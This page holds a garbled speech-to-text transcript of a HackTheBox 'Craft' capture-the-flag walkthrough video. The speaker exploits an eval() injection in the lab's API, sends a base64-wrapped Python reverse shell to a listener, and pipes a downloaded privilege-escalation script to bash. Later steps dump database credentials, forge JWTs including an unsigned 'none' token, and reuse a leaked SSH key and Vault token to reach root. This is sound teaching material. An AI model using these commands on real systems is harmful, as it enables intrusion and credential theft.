HackTheBox - Craft
Key Takeaways
The video demonstrates a HackTheBox challenge, specifically the Craft box, where the speaker uses various tools and techniques to gain access to the box, including API exploitation, JWT token validation, and SSH key manipulation. The speaker also uses tools like GOG, Cherrytree, and Vault to aid in the exploitation process.
Full Transcript
what's going on YouTube the zipsak and be doing crafts from hack the box and I really like this box because its story kind of guides you through the box without making it feel like it's holding your hand telling you what to do you're presented with three web pages the initial homepage and API rest server and a GOG repository which is essentially a host of yourself version of github so you look through the gods repository and you see the source code for the API in addition to the source code you see some issues that point out a RCE and the API because it's using a eval function but you need authentication in order to access that vulnerable function so you look through the closed issues and you see when they added authentication and when they initially added authentication they had hard-coded creds and a test filed testing authentication so you just grab that test file and it has all the authentication for you throw in your RC e and get a shell on the server once you're on the server you want to go into the database and they have a bunch of DB test files for you to use that you just replace the sequel command with the command you want to dump a list of all the users and passwords and from there you go back to the gods of posit or e access a private repo which allows you to get some SSH keys to get into the box and from there the probe ask is pretty simple abusing a service called vault but that's enough talking let's just jump into the box as always we can begin with the end map so - SC for default scripts SB enumerate versions o a output all formats in the end map directory and call it craft and then the IP address which is 10 10 10 110 this can take some time to run so I've already ran it looking at the results we have just two ports open the first one being SSH on port 22 and it's banner tells us as a debian box we also have HTTP on port 443 it's banner tells us it's nginx we also have the end map script running called SSL - cert and it's saying the common name on the SSL certificate is Kratt HDB so before I get too far I'm just going to quickly take notes Windows key L a Windows key left arrow to move that's the left side windows key right arrow to move Cherrytree to the right and then let's just press control and to create a parent dude call it craft control shift and to create a Chow mood and just call this notes and we'll say host names and this will be crafty HT be SSL cert to say how we got it and then we'll say ports open and say 22 and 4 4 3 so just to be thorough and always to have recon running in the background I'm going to do a 2nd ed map with - B - to do all ports - vive verbose - Oh a I'll put all formats and map craft - all ports and 10-10-10 110 now I'm going to rename this window or pain to recon create a new one and let's go edit our host file and put the IP address we just had here so 10 10 10 110 is going to be craft HDB save this and then now we can go over and check the website navigating to http craft htb brings us to this certificate warning click advanced view certificate and let's check there's anything sensitive in here so just going down this list we can see there's a potential username admin at craft HDB so let's go back to cherry tree create a new child node called users and we'll say admin at craft dot HDB and say we got it from an SSL cert okay and then let's go see if there's anything else the main thing I'm looking for is like alternate alternative names which could give us other host names we don't really have that it only has craft HDB so let's accept the risk and continue and then we get this webpage doesn't look like there's too much information looking at the links everything goes to craft HDB there is this link to API craft HDB and I'm looking at the bottom left and we have God's craft HDB so let's go here and notes and say API craft . h TB and on route page and then god's craft h TB paste the same thing and go to a host file again and add these two hosts so cogs craft h db-api craft h TB save this and let's go check these links out so going to gods we get a certificate warning accept the risk and continue and then going over to AP i accept the risk and continue so it looks like these pages are taking a little while to load so we'll just give it some time and it looks like it's some type of documentation page so we see the craft api and if we click on something like slash brew and it gives us examples of how to use this API if we click try it out not sure maybe we have to be authenticated so if we do author login click try it out click execute and we get a forbidden so doesn't look like this all check is working properly they do all check I just clicked on auth login click here okay let's try login try it out click execute and it wants us to log into the page so guest guest it fails but this is telling us that the API is doing an HTTP login so that is useful to know we can say API craft htb and uses HTTP login or authorization so it's not in the post request it's just in specific HTTP requests for logging in and we get unauthorized here that's funny that when I click one both them expand but until we have much information this probably isn't going to help us the models is explaining how the database works but cogs is a like I guess github or package repository so we can look at the GOG version see it is 0.11 86 and its copyright is 2018 so I'm going to go and check search point on GOG 's and then we can do dash x to see the dates on these to see what version is affected going down we see this CVE is 2014 so that's not going to be vulnerable since the copyright errors it's 2018 and we can take a look here and see if there's anything and this one is also a 2014 CBE so there's not much we can do with dogs right now from doing previous hack the box machines I believe if we get an administrative user we may be able to get code execution via a post commit hook but we don't really have an administrative user we can try like administrator administrator and try brute forcing it but that's not gonna really do anything so let's click on Explorer and we have a repository here the craft API so let's go and download this so we can just go back to a terminal get clone paste this and get is giving us a certificate error so let's go and Google get clone self-signed certificate and see if there's anything that will help us check in this Stack Overflow post and it looks like there's get - see and this will disable certificate verification so paste this in we're on this and now we have downloaded the craft API but before you go may only through this let's take a look back at the gods page to fully enumerate this and we do see there is an issue we also see potential user names so I'm just going to look at the commit history and we see Ibaka med and Dinesh have went here so copy this go here and get some users so Dinesh I'm just going to type this so it's not a link and this will be cogs and then II Bachman cogs take a look at the issues we have bogus ABV values and the premise of this box is it's a bunch of people from Silicon Valley creating a brewery so you can see craft a needs to be the largest repository of us produced craft brews so the biggest ABV values is saying hey is it possible to make it so we can't add ABV values that don't make sense and we also have a coal command here that's giving us a token so let's take a look at this token this is a JWT token and we can validate that by just running base64 against it so notes I'm just gonna put JWT token paste and let's base64 this so if we copy go here echo - n paste base64 - D we see it's HS 256 type JWT the second value is going to tell us the data inside this token so echo - n paste this base64 - D it's a user and it expires at this epoch time so let's copy this and epoch - date and see when this token expires if it's still active we can just probably replay this token and get access to the API but it looks like it expired February 5th 2019 so this tokens not gonna really help us however we may be able to brute force the signing which is this piece this piece is just pretty much a signing the first two pieces of this token and if you get the secret that used to sign then you can forge your own JWT tokens and I do that in another video if you just go to probably epic rocks and type in JWT you can see me doing other JWT things so definitely check out that video I think it was Luke but let's just try cracking it so going into my crafting machine if you don't have one which you probably don't just use your host computer don't use a VM because VM is a slow at cracking so I'm going to go into hash cat hashes I'm going to create the file called craft and I'm going to copy the token and paste it in and then go in hash cat and I'm going to dot slash hash cat then example hashes and I'm going to pipe that to less and I'm going to search for JWT and it is mode 16500 so I'm gonna do dot slash hash cat - m16 500 hashes craft and do op word west rocky text and we can see it's starting and it's already ran through rocky text didn't find anything so we can just specify rules file because JWT tokens brute force really fast so it made me worth it to use like actual brute forces and do entire key spaces in case it's just like a random eight character thing but if it's more than like ten characters chances are you won't brute-force it in any meaningful time even if it is just random so looking at this this says it's going to take about an hour to do so I'm just gonna not use the dive rule set and instead we'll use pass 64 which should finish relatively quickly but this isn't actually crackable so we won't really get anything just showing you kind of how quickly you can crack these hashes so that's rock you on best 64 finishes in like 20 seconds so probably about the same speed as ntlm maybe a bit slower but that's that that's trying to crack it doesn't work so we get out of the crackin and move back on to what we're doing and that is examining the issues so he pasted this request and we see that we can't replay the request because the JWT tokens expired and he's making a post and setting the ABV to 15 and he says this should just be rejected so Erlich is asking him hey can you just do this and Dinesh being the crappy coder he is does say yep the fix is live and working and gives us the commit and then guilfoyle is saying this should have been done and the database can you fix this bad patch before something awful happens and looking at Dinesh this patch we can see he's running eval on request dot JSON ABV so direct user input into evil means we have a code execution so let's copy this thing go over and go into craft and say this file and post this line I already copied the tabs so that and we can also put the commit so let's see commit is right here RC e and then if you wanted to be really really thorough you could press like control shift print screen and then copy this and then go here and say this will be commit and paste the screenshot so this would be handy if you're doing the report later to have pretty screenshots of everything but let's go back and look at the issues looking at the closed there is an issue from guilfoyle asking you add authentication and we didn't get guilfoyle username before so let's copy this go back into chariotry go to users but guilfoyle and say we got it from gods and let's take a look at this so this is asking us to add authentication and guilfoyle is saying hey add off and Bachman is saying ok alt has been added and this is actually going to a 404 so let's copy this go to notes and just say commit goes to 404 so let's analyze this whole get repository locally and you can do that with git log which we will do but let's pull some automated tools to do this first so to do that I just installed this Cali version so I don't have go or pip3 installed so let's install those so I'm going to do app install going to install go and while that runs let's do make der - P home go and then we got create three directories which is package bin and source and then let's go into a dot profile and export go path is equal to home slash go we want to do go bin is equal to go path slash bin and then we need to update my path and path is equal to path then go bin so if we did this in the Etsy we'd add it for all users since we're doing this into a home directory dot profile we're only making this change for our user and then we can do source start profile to load this and now we have the go commands but I'm going to do two tools the second tool is going to be a Python tool so let's install Python 3 - dev and python 3 - pip so while that installs we can begin working on a go install and the first tool I want to install is get leaks so search get leaks github and we can go and install this so let's do go get - you to install this and if you do - V well you can't do multiple dashes in one - V - you this tells you what it's doing as it installs so we do have PIP installed so we can just do PIP in tip 3 install truffle hog and this is a just another tool I like to analyze these libraries with so I'm just going to wait for it get leaks to finish and then we're beginning to analyze these get repositories so get leaks has been installed we can just ctrl D to get out of that and if I search get leaks I don't have it in my profile cuz I did this source command and that bottom pane so I'm just going to do that again and now we have the tool get leaks so to run this we just specified - V for the boosts and - - sorry PO - path is equal to we can say our current directory because we're inside the repo already and we see no leaks detected we can also run truffle hog against this and truffle hog just wants the path so I'm gonna do the same thing I did before and we don't have it finding anything if you give truffle hog a bad path it airs out so you know both of them did run on this so let's just go manually take a look at this so I'm going to do git log to view all commits and I'm gonna go through each one of these manually so take the first one get diff paste this in and that's head and there's no difference between where we're at and where that was so get diff on this one and we'll see what has been added this is adding a file called DB test and DB test looks like it can run or all sequel commands however they did the connection parameters correctly and everything's in variables so just having this script doesn't leak the host the user the password etc we need to get this settings variable so I'm just gonna do fine dot and grep for config or grep for settings and we don't have any of those files this gate config is specific to the repository so this is not in the file if we do cat get ignore we can see settings dot pi is set to be ignored so that's why it's not in this repository so let's go take a look at the next one actually before we do we should take note that DB test allows raw sequel commands to be R and so commit for for let's do DB test for all SQL command template need creds okay so get log take a look at the next one so I think that was a two so let's do one zero just going up yes that was a - so get diff one zero and let's see this is the same DB test I think we saw so nothing there looking here we do have credentials so Dinesh and this password so let's go over here and users will do creds and this is Dinesh with the password of that so we can test this password out but let's just go and finish analyzing everything so let's do git log again and do the one after 10:03 so i'm also going to add notes and i'm going to take a new child node and say get harvesting and say creds so the next one is this fix and then based upon the comment this looks like it's the fix that we saw in the issue so going down we just have this test dot PI and this test up I was I believe what was at in the previous commit but we don't have authentication here so we can take a note at this notes DB test and test dot PI and this will test issue number two with bogus ABV and I'm taking a note of this because this will be useful for RC e as it's a good skeleton script so skeleton script just means like it's got all the details there so we won't have to create a script to authenticate to the API and then do all this stuff because the scripts already here so just reusing what the developer has and then we have two more commits to go over we got this for FD get diff looking at this this is the one where they added authentication and looking at this doesn't look like we have anything so get log and we'll do a get diff on the final one this is the initialization see if there's anything here does not look like anything so we can this one commit because we already analyzed it there wasn't anything interesting in that one but we got D be testify and testify and a credential so let's take a look at the credential and user creds Dinesh we can try SSH Dinesh at 10 10 10 1 10 put the password in and it does not work if we go over back to a recon tab from a long time ago we have a port 6 0 to 2 and if we went to God's and looked at the SSH we have the SSH server for dogs running on port 6022 so we can show you Dinesh is creds their SSH to Nash at 10 10 10 1 10 and when you specify port 60 22 and it only relates public key authentication in so there's nothing really there we can try logging into gods so Dinesh paste the password and now we can login with Dinesh looking at his profile we don't have anything unique here and looking at settings he's not an admin on cogs so there's nothing we can really do we could potentially add a SSH key and then use this server as a pivot box so if we do add key tips ACK and let's go here make the SSH and we'll do SSH key gen and we'll call this Dinesh cat Dinesh Pub we can copy this and paste the contents add the key and then chmod 600 - pub and there's two ways we can abuse this key the easiest way is just go SSH config and say host Dinesh - crafts and then his name is gonna be 10 10 10 1 10 user is Dinesh and then identity file is root htb boxes craft SH Dinesh so if we ssh to Dinesh - craft we didn't specify the port so what 6022 shn and it just hangs so I can do the squiggly period that's that and then period to exit the SSH session and all you have really here is a way to do port forwarding so if we do like - L and we can specify 3306 and then localhost 3306 to try to forward it but we don't really have any of the internal IPS yet so SH forwarding isn't really going to help us if you want to know more about ssh forwarding definitely check out the reddish video or ad is H because that's the one we do most of that stuff in let me make sure that's it epic got rocks our ad is H yep that's a box so definitely check out that video if you want to do port forwarding so I guess with all that the only thing we can really do is check out test pi with the credentials we have so let's go and see if this works so in order to test this we can just click on off log in and then click execute and try logging in with the creds Dinesh and then go here grab the password paste it in and now if we execute on auth check it looks like it's still getting forbidden I don't know exactly how this test page works let's just try it out and test op pi so go in the craft API tests and then he's got test dot pi so let's put his credentials here we can paste the password and paste the user Python 3 test by and we can see the message says token is valid so over here make sure the token is valid he's putting the response so this does craft a successful token with his username the main thing on do right now is get rid of these annoying error messages like here so to do that let's just go edit the conscripted n go near the top and then just specify request packages URL web 3.4 nning z' and then we can run the script again and we can see there's no more warning messages so now we just have to find the code execution point so let's go back to cherry tree and go to our notes and we see that the execution point is in the ABV value which is right here so what we're going to do is create a command so we're just going to do CMD is equal to and because this is an eval it should be on one line so I'm doing this input statement this way because this is how you do an input on one line essentially so import OS and then system ping see 110 1014 - and then close it out so what we do now is we just put CMD here for the 15 and this will put this Python code right there and it should get emailed so Python 3 testify and before we do that let's do TCP dump - n - I ton zero ICMP run this logging in and we get a single ping request so now we know we have a way to get a shell in the box so let's go and get a reverse shell oh we knew we had code execution on the box I should have said so I'm gonna search pen test monkey reverse shell cheat sheet and we'll get a Python one-liner so let's grab this grab Python and we don't need this - see just grabbing all of this and if we do CMD equals and he uses double quote so I'm going to use single quotes and we can try this again we didn't edit a IP information so we are ten ten fourteen two and point nine thousand one because I enjoy it being over nine thousand but NCL vnp nine thousand one and run this again and it doesn't actually work and like I said before eval likes things being on one line that's my best explanation so I'm gonna grab CN excuse me CMD out of test dot pi and we're going to make this eval statement one line so the shell PI and I'm going to paste as sefa shell code yeah SC for shell code and I say equals and put this in three quotes because three quotes will span a line I'm going to do : % s semi colon backslash R for return and enter and I'm just going to clear these lines up so now this is just all on one line and if I test this out with print SC we can Python 3 shell by and a prince or a shell so what I want to do is do from base 64 important code and we're going to print bees 64 encode on SC and let's see a bytes like object is required not string so if I do SC i encode to convert this string to a bytes object in Python we get this base64 so I'm going to copy this before I begin let's just make sure everything's correct 1010 14 - if config tun 0 1010 14 - okay so let's go back into test dot PI and we're going to change the CMD to be equal to import base64 dot be 64 decode and we're going to paste the string and I'm also going to wrap this entire thing and an exec which is just like eval so I'm exec this entire script and if we do Python 3 test op I we get a shell so the interesting thing is the shell isn't actually progressing forward so whenever I get a web shell on a web server I like going back to the web server and making sure I did not crash it because if it's completely single threaded you may hang the entire web server so refreshing the page does have a come back so I don't the way about hanging the web server one interesting fact is this web shell is actually printing the standard out from the web server but we did ignore that so let's just get a proper shell with Python - C input PT y PT y dot spawn and O then SH that's again just output from the shell I'm gonna re get this because I messed up typing and I couldn't control C without killing my whole script cell Python - C input PT y PT y dot spawn then Sh oh let's see import I screw up the command again some reason I can't type today import PT y PT y dot spawn in SH there we go and now background control Z s TTY raw - echo enter F G and a and again and now we got a proper shell so what we can do is look in DB test dot PI and if we looked at a notes DB test lets us run raw sequel commands but we need creds however we are now on this box so we can go in craft API and cat settings PI oh man it's got a lot of HTTP input cat settings not pi we can grab this and I'm going to create a note this is on API craft htb shell settings dot pi and we can say how we got the shell got through ABV code exact DeBell okay and I guess if we want to be really thorough we could cat theft API DB test that's in tests and test op i head and copy the command yeah just pro notes but now we have credentials into the database so we could either try doing a tunnel into the database or we can just edit the script and editing the script i believe will be quicker so that's what i'm going to be doing so I'm going to copy DB test PI into db2 dot PI and then if we do VI DB 2 pi let's fix the terminal real quick so open a new pane stty - eh I am 34 rows 136 columns so let's do here s TTY rows I say 34 30 to 34 I'm on recon I shouldn't pin in Israel but 34 and calls was 136 136 so let's rename recon to shell so now if i VI DB 2 pi my vim session looks correct and Rose is just these and comms goes up and down so that's all we did with that so now we can just edit this and we can do potentially show tables let's try this first to see what tables are here so we can do show tables and Python 3 DB 2 pie tables and craft brew if we do fetch all instead of fetch one it will fetch everything so we can also say for I n result 1 2 3 4 print I to clean up the input a bit so running this we can see two tables brew and user so we could have also went through the code we go let's see where's explore here dashboard craft and what to craft API database models and we can see it defining the class user which is going to be the database user so user has ID and username so two ways to do the same thing but I'm going to take this line comment this and we will do sometimes it's just missing my skate key stroke which is weird select star from users and run this command craft users doesn't exist and that's because it is user I believe there we go and we get other user names so if I cat db2 dot I run that again I'm going to do control shift print screen I think I hit the wrong key ctrl shift print screen copy and we will go over here users creds and I will do nooch all-nude SC for screenshot and I'll call this DB dump paste and in creds copy from database and we can try ss-18 with all these creds and boxes but that's not gonna really do anything instead let's try walking into dogs with them so no one other thing before we log into GOG x' if we go into the settings CD craft API cat settings we have the craft API secret so we can also validate that a cracking would would have worked if we had this so we can go into crack in ash cat the test paste this and we can do dot slash hash cat I forget what mode it was hash cat - 8 - - example hashes less JWT 16 500 so dot slash hash cat mood 16500 and then we want to specify hashes craft and test and we can see hash cat has successfully cracked that hash so if this was a dictionary hash or a hash based upon a word we probably would have cracked it earlier and been able to skip all that but now if they change their passwords it doesn't really matter because we can craft our own tokens so if we just do Python 3 and port JWT I don't have it tip 3 install JWT and then python 3 input JWT if we can say secret is equal to man that did not paste well secret is equal to this and this g60 okay and now we can just create a token so encoded JWT is equal to j WT in code and we have to specify the data we want to encode so if we go back to notes we can copy this and we will do echo - n paste base64 - d we want to say user is user and expiration is will do current epoch time go here copy/paste and we'll change this to be 6 so this can be a super long-lived token and then we do the secret which is secret and the algorithm is HS 256 ok JWT has no method in code JT dot c they do the wrong JWT or did it change on three tip three install pi JWT I think this is the method I want lights on three import JWT secret is not defined secret there we go encoded JWT and we have a token so we can copy this and if we go back to this page do all check let's see try it out okay that's not working I guess we should edit testify so craft API test will CP testify to be off PI be author PI and will say get rid of this and all we have to do is test authentic and we'll leave it at all is equal to Dinesh and then we will oh wait they're not to even do that we can delete this page delete this page and token is equal to this so if we do Python 3 auth dot PI we get token is valid so we just crafted our own token and while I'm here let's just try one thing that I actually haven't done what do algorithm is equal to none no secret what if I just get rid of algorithm altogether let's see algorithm equals none do pi j dt generate token without secret what if I just if I nothing like that and kurta JWT okay that did it so if I copy this and we'll paste this in for the token and run this again we get token invalid or not found so that's just a simple test on some JWT things because if we look at this token again we should see let's say there's no signing base64 - D auth none so if the application itself isn't hard-coded to make sure the algorithms what it expects then you'll be able to specify done and not sign anything and sometimes the application will accept it if it's coded poorly so that is that I just want to specified none like this real quick okay yep I did that correctly so that whole path has been solved so what can we do now where was I logging in with credentials on gods so sorry for that detour hopefully you enjoyed it and learn something so sign out refresh this page sign out there we go sign in and we can go back to creds and we can try logging in with Erlich Bachman copy-paste sign-in failed let's try guilfoyle law again and we get in as guilfoyle and we have a private repository called craft - infrastructure and I'm also checking and Gilfoyle is not an admin here either so we can't create that post hook but we have a bunch of interesting things on Gil Flores depository so like last time let's just copy this down to a box so to do that we have to go to is settings and we will create an SSH key so add key and we can close out of this px kill pain there we go and we'll make this just bash again so let's make oh we already have SSH so we'll do SSH - key gen and we'll call this one guilfoyle chmod plus x 600 guilfoyle cat guilfoyle pub and let's copy this in and if we go back here epic paste the key it's kind of funny that he has a key for Anton in here it's good for from the shell but go into config SSH config and we'll copy this I think five say guilfoyle - craft user guilfoyle I know this is gonna be get because we want to use git guilfoyle and how get does it you always use that username it uses your SSH key to identify who you are because if we go back to his repository ion craft infrastructure we can see it's telling us to use the name SSH so dogs craft on htb be yeah that should be fine we can do get clone and we can say guilfoyle - cogs / guilfoyle / craft - infra get that did not work let's just do this the correct way copy first first name now we can get clone there we go so now we can go craft infra I'm in the wrong directory let's move this into craft and we can run a tools that we did before on this one so what do get leaks and we'll say the repo path is PWD and no leaks detected and we can do truffle hog with file colon slash slash PWD oh we're in API CD craft infra get leaks and we have one line it is flagging on begin OpenSSH private key so one leak detected with that tool and we can try chuffing hog and it looks like this gets more so truffle hog reason is high entropy so it finds the SSH private key here also finds that SSH public key and then a GPG key for something called vault and this looks like it is a apt repository thing so not the actual key for a software just repository adding it so demo of there's both tools we could also do get log and I guess we can look at each of them since there's only two so disable the vault UI is adding the secrets thing so we can see won't write as a trolls root OTP which is by root one-time pad username root for all hosts so once we get on this box there's probably something interesting in vault and then we can look at infrastructure configs get diff and see all this UI is set to false and that does that secrets config thing again so looking through this the get weeks did tell us that there is a SSH key somewhere we don't see it here but if we do LS la you can see that dot SSH directory and there's ID or si so OS la it is currently I believe the wrong permissions so chmod 630 RSA and let's try this key with Gil foil at 10 10 10 110 it wants a passphrase so let's see if he reuses his password so take it from the database dump paste it in and we get a low privileged shell on this box so the very first thing I do when I want to prove esque is I want to run Lin pas witch's privilege escalation awesome sweet so the reason why I didn't do it before was I was in a docker container if you looked at the slash directory you woulda seen dot docker and so that's why I didn't do it before so I probably messed the whole enumeration step there just Deacon straight to the source but we were in docker so if we re exploit that box I should have looked into this TAS NCL VMP 9001 Python 3 desktop PI craft API tes LS la / you see we're in da core M and looking at the IP address it's 172 2006 so missed all that doing it before my bad but now we are no longer in Dhaka so let's run that script sweet it's an opt privilege escalation awesome sweet limpy's NC l vm p 9001 and direct the script there and let's do NC 10 1014 to 9,000 one pipe it to bash we can probably do - cat dev tcp 10 1014 to nine thousand one and pipe that to bash o echo dev tcp 10 1014 to 9,000 one - okay let's just download or python m simple HTTP server there we go girl okay curl 10 10 14 to 8 thousand and the script we want is Li NPA SSH pipe to bash so about before I was drawing a blank on how to execute directly with bash but this grip shouldn't take too long to run so that is now ran we can go back up and go through all these results so the cool thing about this is it highlights things we should look at so going through shouldn't take too long we just want to look at things in red so Newport scan capabilities found because NC is not there nothing there looking at processes running by route we got app pi so we could always check if we can modify app dot PI and maybe get code execution there but nothing too interesting fine Airy cron jobs user information all users on the Box looking at SH we can see route login is allowed and there's also challenge response authentication whoops and we have it's set to use Pam and looking at this we have off and having a specific log called vault SSH and before we saw some things with vault in the git log so this is saying probably should look at vault quite a bit we also have a file called token in guilfoyle and looking at vault ssh files we can see potential SSH key here so just something weird user local Etsy vault SSH opera and we get another host name vault craft htb on port 80 200 and I'm not going to look into this that much because looking through the get config said the user interface was disabled so should definitely go look involved so I had copied that vault token to my clipboard so just going to Google we can say vault token file and see exactly what this is goes to project and if we read this it's kind of like a cached credential in vault so what you probably want to do is read these man pages and see how to use vault and you can say vault SSH example and go to vault project and it gives you a command won't SH - mode OTP user at that and if we went back through that git config but I'll probably just go through here go to vault secrets at SH you can see vault right he's writing the role s is a troll to vault and saying the default user is root so if we just do vault and case this and user is going to be root at one 27001 fail to get credential making API request so let's do it's weird let's see vault list cat dot vault token fault SSH root at one twenty seven zero zero one so that worked so it says the one-time pad for this session is this and we can log in and that is the box so you may be thinking that is extremely silly but that's just because of how vault was configured to hard-code leave that authentication token that behind so if we had not had that file so if we do or MDOT vault token actually let's cap this first and do our m dot vault token and run this command again so vault SSH root at one 27001 it doesn't have the token so it just created that token that was saved and that was the issue vault probably has some specific way that it wants you to login let's see I walk in with this token permission denied but you're supposed to log in legitimately with vault and then it gives you permission for a little while to access the database so that was the issue the file supposed to be there and that is the box so I hope you guys enjoyed take care and I will see you all next week
Original Description
01:20 - Begin of recon
03:18 - Checking out the HTTPS Certificate for potential hostnames
05:10 - Looking at api.craft.htb, appears to be some type of Documentation for the REST API
06:40 - Looking at gogs.craft.htb, no known exploits but there is some source code!
09:20 - Checking out the Git Issues, seeing Dinesh put a JWT Token in a comment. Checking the token out
11:25 - Attempting to crack the JWT (fails)
13:30 - Going back to the issues to see there is an eval() on user input
16:25 - Installing Go and Pip3 on Kali 2019.4, so we can install GitLeaks and TruffleHog
18:57 - Running GitLeaks and TruffleHog (find nothing) then manually analyzing the git commits
21:20 - Discovering Dinesh's credentials in an old git commit
25:05 - Logging into GOGS with Dinesh, then showing adding an SSH Key for potential port forwarding
28:28 - Testing Code Execution from the previous git issue, use the test.py script as a skeleton.
31:30 - Getting a reverse shell with this exploit using exec(base64)
35:10 - Reverse Shell Returned
36:15 - Grabbing settings.py on the server to get a bunch of credentials
37:30 - Fixing our terminal to have the correct rows/columns so we can use vi
40:18 - Editing dbtest.py to dump all users from the database
42:00 - Adding the JWT SECRET from settings.py to our hashcat wordlist to prove cracking would have worked if there was a weak secret
45:25 - Manually crafting a JWT in Python to show what to do if you are successful at cracking... Then trying to create a JWT that is not signed
49:10 - Logging into GOGS with the credentials we got from dumping the database
50:20 - Gilfoyle as a private repo, lets download it
53:30 - Running truffleHog and GitLeaks against Gilfoyle's craft-infra repo
58:00 - An SSH Key was found on Gilfoyle's repo, SSH in and run LinPEAS
01:00:00 - Bunch of references to Vault in LinPEAS, looking into what this is.
01:02:20 - The .vaulttoken file is saved creds, lets just use vault ssh to login to the box
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from IppSec · IppSec · 0 of 60
← Previous
Next →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
HHC2016 - Analytics
IppSec
HackTheBox - October
IppSec
HackTheBox - Arctic
IppSec
HackTheBox - Brainfuck
IppSec
HackTheBox - Bank
IppSec
HackTheBox - Joker
IppSec
HackTheBox - Lazy
IppSec
Camp CTF 2015 - Bitterman
IppSec
HackTheBox - Devel
IppSec
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
HackTheBox - Granny and Grandpa
IppSec
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
HackTheBox - Optimum
IppSec
HackTheBox - Charon
IppSec
HackTheBox - Sneaky
IppSec
HackTheBox - Holiday
IppSec
HackTheBox - Europa
IppSec
Introduction to tmux
IppSec
HackTheBox - Blocky
IppSec
HackTheBox - Nineveh
IppSec
HackTheBox - Jail
IppSec
HackTheBox - Blue
IppSec
HackTheBox - Calamity
IppSec
HackTheBox - Shrek
IppSec
HackTheBox - Mirai
IppSec
HackTheBox - Shocker
IppSec
HackTheBox - Mantis
IppSec
HackTheBox - Node
IppSec
HackTheBox - Kotarak
IppSec
HackTheBox - Enterprise
IppSec
HackTheBox - Sense
IppSec
HackTheBox - Minion
IppSec
VulnHub - Sokar
IppSec
VulnHub - Pinkys Palace v2
IppSec
HackTheBox - Inception
IppSec
Vulnhub - Trollcave 1.2
IppSec
HackTheBox - Ariekei
IppSec
HackTheBox - Flux Capacitor
IppSec
HackTheBox - Jeeves
IppSec
HackTheBox - Tally
IppSec
HackTheBox - CrimeStoppers
IppSec
HackTheBox - Fulcrum
IppSec
HackTheBox - Chatterbox
IppSec
HackTheBox - Falafel
IppSec
How To Create Empire Modules
IppSec
HackTheBox - Nightmare
IppSec
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
HackTheBox - Bart
IppSec
HackTheBox - Aragog
IppSec
HackTheBox - Valentine
IppSec
HackTheBox - Silo
IppSec
HackTheBox - Rabbit
IppSec
HackTheBox - Celestial
IppSec
HackTheBox - Stratosphere
IppSec
HackTheBox - Poison
IppSec
HackTheBox - Canape
IppSec
HackTheBox - Olympus
IppSec
HackTheBox - Sunday
IppSec
HackTheBox - Fighter
IppSec
HackTheBox - Bounty
IppSec
More on: LLM Foundations
View skill →Related AI Lessons
⚡
⚡
⚡
⚡
Common Next.js Errors (and How I Solved Them)
Dev.to · gary killen
Applying Scalability in Backend (CodeBuddy)
Medium · LLM
Why Every Backend Developer Should Learn Nginx Before Going to Production
Medium · DevOps
Connecting Frontend to Backend: A Backend Engineer’s Reality Check
Medium · Programming
Chapters (25)
1:20
Begin of recon
3:18
Checking out the HTTPS Certificate for potential hostnames
5:10
Looking at api.craft.htb, appears to be some type of Documentation for the RES
6:40
Looking at gogs.craft.htb, no known exploits but there is some source code!
9:20
Checking out the Git Issues, seeing Dinesh put a JWT Token in a comment. Check
11:25
Attempting to crack the JWT (fails)
13:30
Going back to the issues to see there is an eval() on user input
16:25
Installing Go and Pip3 on Kali 2019.4, so we can install GitLeaks and TruffleH
18:57
Running GitLeaks and TruffleHog (find nothing) then manually analyzing the git
21:20
Discovering Dinesh's credentials in an old git commit
25:05
Logging into GOGS with Dinesh, then showing adding an SSH Key for potential po
28:28
Testing Code Execution from the previous git issue, use the test.py script as
31:30
Getting a reverse shell with this exploit using exec(base64)
35:10
Reverse Shell Returned
36:15
Grabbing settings.py on the server to get a bunch of credentials
37:30
Fixing our terminal to have the correct rows/columns so we can use vi
40:18
Editing dbtest.py to dump all users from the database
42:00
Adding the JWT SECRET from settings.py to our hashcat wordlist to prove cracki
45:25
Manually crafting a JWT in Python to show what to do if you are successful at
49:10
Logging into GOGS with the credentials we got from dumping the database
50:20
Gilfoyle as a private repo, lets download it
53:30
Running truffleHog and GitLeaks against Gilfoyle's craft-infra repo
58:00
An SSH Key was found on Gilfoyle's repo, SSH in and run LinPEAS
1:00:00
Bunch of references to Vault in LinPEAS, looking into what this is.
1:02:20
The .vaulttoken file is saved creds, lets just use vault ssh to login to the b
🎓
Tutor Explanation
DeepCamp AI